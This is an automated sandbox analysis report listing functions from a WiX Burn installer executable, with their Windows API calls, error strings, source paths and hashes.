                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MultipleObjectsWait
                                                                                                                                                                                                                                                                            • String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 862713236-4067188417
                                                                                                                                                                                                                                                                            • Opcode ID: a94062e8ebac32f928651714a6484fe749da1b0b9993a7d8328b709f31e41c05
                                                                                                                                                                                                                                                                            • Instruction ID: 17eba64fdaeff1a4a9e445c37f43557423820f06c9b1a82a967313ce17f6b37b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94062e8ebac32f928651714a6484fe749da1b0b9993a7d8328b709f31e41c05
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16210576A412A573DF20996B4C4EF9F6958FB57F61F164225FE02FF291E6708C4082E0
                                                                                                                                                                                                                                                                            Function 008E9880 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E9893
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9938
                                                                                                                                                                                                                                                                            • Failed to set system folder variant value., xrefs: 008E9926
                                                                                                                                                                                                                                                                            • Failed to get 32-bit system folder., xrefs: 008E98D7, 008E98FF
                                                                                                                                                                                                                                                                            • Failed to get 64-bit system folder., xrefs: 008E98B8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 896058289-2644686703
                                                                                                                                                                                                                                                                            • Opcode ID: 8bad6c356e38c23b6a4dd915635e91bdee0efa86d0f6f08ab60078871a54f9b5
                                                                                                                                                                                                                                                                            • Instruction ID: 799ca4a1c3a2e30124f1910be22dbe986371e3b7430330b2a68ab293743b3da7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bad6c356e38c23b6a4dd915635e91bdee0efa86d0f6f08ab60078871a54f9b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08210731E406A5B6CB22E697CC0AF8F7D68FF92B50F114165F984FA1C2E6F09A009691
                                                                                                                                                                                                                                                                            Function 008FC54C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,008FD5FB,?,?,?,008FD2F1,001F01FF,008FD617,00000000,00000000), ref: 008FC5A2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008FD2F1,001F01FF,008FD617,00000000,00000000,?,008FD5FB,0000001A,001F01FF,?,00000000,00000000,?), ref: 008FC5AC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2186923214-3368738088
                                                                                                                                                                                                                                                                            • Opcode ID: 8217bc074b334662414b5b1d141eeab1acf34d573f6097fd7487dcafe1e50624
                                                                                                                                                                                                                                                                            • Instruction ID: 64a64d6e3d364156a5f7b42a7339b7e9fc420ab896875b0a0db619447a9665ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8217bc074b334662414b5b1d141eeab1acf34d573f6097fd7487dcafe1e50624
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 641138B2A4032872E620E67B4C4EF6B6A5CFB86B61F110115BF08FB281E1B4DD0082F1
                                                                                                                                                                                                                                                                            Function 00948C8F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00948D33
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-474062544
                                                                                                                                                                                                                                                                            • Opcode ID: 3c1a3256a6d611d8966abd23e1ba0a5de468df9aabc09d0d397eac17168e7eef
                                                                                                                                                                                                                                                                            • Instruction ID: c3c77cc9e3e7e547bed81ce164732b9389f03753283c7a163a903a25bede0550
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1a3256a6d611d8966abd23e1ba0a5de468df9aabc09d0d397eac17168e7eef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E91150B2A41314B7D73266598C8AF7FA95CDF91B65F114124FB04BB1C1AF714D0092F5
                                                                                                                                                                                                                                                                            Function 009424D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,008E6C5C,00000000,00000000,?,?,00000000,00000000), ref: 009424FE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to backslash terminate shell folder path: %ls, xrefs: 00942558
                                                                                                                                                                                                                                                                            • Failed to get folder path for CSIDL: %d, xrefs: 0094250D
                                                                                                                                                                                                                                                                            • Failed to copy shell folder path: %ls, xrefs: 00942539
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 00942567
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                                                                                                                                            • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1514166925-3657258693
                                                                                                                                                                                                                                                                            • Opcode ID: b476d5e6fd5a4cec84a34276a4cbec8de31de23ae7751b3acc92f1efb95157b4
                                                                                                                                                                                                                                                                            • Instruction ID: 316fbd3d02a68436f5af04ffe360bb47b769819e95b98fe26c16c3fc3eebd565
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b476d5e6fd5a4cec84a34276a4cbec8de31de23ae7751b3acc92f1efb95157b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B111A772780328B6E721AB689C4AF7F7BACEB45B54F114151B908FB182E770DE0446A1
                                                                                                                                                                                                                                                                            Function 009468FF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E174A: WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(000000FF,00000000,000000FF,?,008E6CF2), ref: 00946944
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094694E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                                                                                                                                                            • String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 113644094-2957177065
                                                                                                                                                                                                                                                                            • Opcode ID: 649f8a8a3036393320884e23c670c5796d73e0e8d140dde2f2e0bb39000bb9ff
                                                                                                                                                                                                                                                                            • Instruction ID: 9e9d61a68f2b0d67082ef0726454bc6d3d30098682f0982b96bed73186779fa0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 649f8a8a3036393320884e23c670c5796d73e0e8d140dde2f2e0bb39000bb9ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401A177A80324B6DB311A5A8C0AF6B6D58AB57BA0F054115BE08FA281F2B19C50D2D2
                                                                                                                                                                                                                                                                            Function 009033CE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,008E805E,?,?,?,?,?,?,?), ref: 009033EB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E805E,?,?,?,?,?,?,?), ref: 009033F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3848097054-817072838
                                                                                                                                                                                                                                                                            • Opcode ID: ace03e8bbeb9af3943f50d748fe1f4c28d073f7bfdefd5b2ed17d42706592e21
                                                                                                                                                                                                                                                                            • Instruction ID: c45722c99ca7e8f64ed9cbed5e5793df1663fe7002fe2bb6b84553ff395bffee
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ace03e8bbeb9af3943f50d748fe1f4c28d073f7bfdefd5b2ed17d42706592e21
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8014972B807353BD622956A5C0FF5BF94CAB42BA5F018221FE14BF1E0A2A19D5082D1
                                                                                                                                                                                                                                                                            Function 008E174A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55synchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                            • String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 24740636-2056904685
                                                                                                                                                                                                                                                                            • Opcode ID: 3efdd2a9a454e67ea5895c985b27f9482b6cb663bc91676141d51879f70c3df4
                                                                                                                                                                                                                                                                            • Instruction ID: 963fb5e30dd0ebf2b1e145f4a51c2142b1a942d4146a1032c778a819b12211b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3efdd2a9a454e67ea5895c985b27f9482b6cb663bc91676141d51879f70c3df4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F201F236A4022833DA2011578C8DF7F695DFB4BFB0F128421FE48EB281E6348C0092E1
                                                                                                                                                                                                                                                                            Function 008E6C99 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E6D30
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E6DCB
                                                                                                                                                                                                                                                                            • Failed to start bootstrapper application., xrefs: 008E6C99
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCriticalDeleteErrorFreeHandleLastLibraryProcSection
                                                                                                                                                                                                                                                                            • String ID: Failed to start bootstrapper application.$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 835895727-1751393740
                                                                                                                                                                                                                                                                            • Opcode ID: e5ce92f5c61aaab32032b8f51d47f5d0c14de8dc4bcdd24f1dd0668698604ef4
                                                                                                                                                                                                                                                                            • Instruction ID: cb1a10bca59fae4a22b0aa6451181f6c7fdbee565e0a692a7f683d4de6444991
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5ce92f5c61aaab32032b8f51d47f5d0c14de8dc4bcdd24f1dd0668698604ef4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F811A171B00248BADB01EBE5DC86FEDB778FB15319F404025F215F5091E3B29A60CB51
                                                                                                                                                                                                                                                                            Function 009062F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 00906300
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32(?,00909CE0,?,?), ref: 0090636B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to pump messages in child process., xrefs: 00906347
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 0090631E, 00906359
                                                                                                                                                                                                                                                                            • Failed to initialize COM., xrefs: 0090630C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize COM.$Failed to pump messages in child process.$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3442037557-3194279326
                                                                                                                                                                                                                                                                            • Opcode ID: 8232716b8c8e1f1cd1fdf7bbae9406d1295b1ae394bdf997b3b53575872c9487
                                                                                                                                                                                                                                                                            • Instruction ID: 2415eeb57910e3a2cd8f72ea952e41e173d7c253aa540541dcc61ecfe645aecc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8232716b8c8e1f1cd1fdf7bbae9406d1295b1ae394bdf997b3b53575872c9487
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E0162B1E447247FDB11EB598C0BF9A39A8EB46B51F010151FA05F72C0E6A1A9508BE5
                                                                                                                                                                                                                                                                            Function 0092E68E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D7B140E6,?,?,00000000,0094D0D5,000000FF,?,0092E66A,0092E74E,?,0092E63E,00000000), ref: 0092E6C3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0092E6D5
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0094D0D5,000000FF,?,0092E66A,0092E74E,?,0092E63E,00000000), ref: 0092E6F7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            • Opcode ID: 175850b421d1b1c67ef3c3fd1af1f7bc6615bc5dfe3ee709543559ab93f711c9
                                                                                                                                                                                                                                                                            • Instruction ID: 5d357aae9687a67b5c9d0611a1e25d88dcdf137765886cbaf84a7959677341cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 175850b421d1b1c67ef3c3fd1af1f7bc6615bc5dfe3ee709543559ab93f711c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601DB75558629EFDB118F50DC09FBEB7BCFB45B14F000625F811E22D0DB749800CA54
                                                                                                                                                                                                                                                                            Function 009360E0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00936165
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093622E
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00936295
                                                                                                                                                                                                                                                                              • Part of subcall function 0092F62C: HeapAlloc.KERNEL32(00000000,00931970,?,?,00931970,00000220,?,00000000,?), ref: 0092F65E
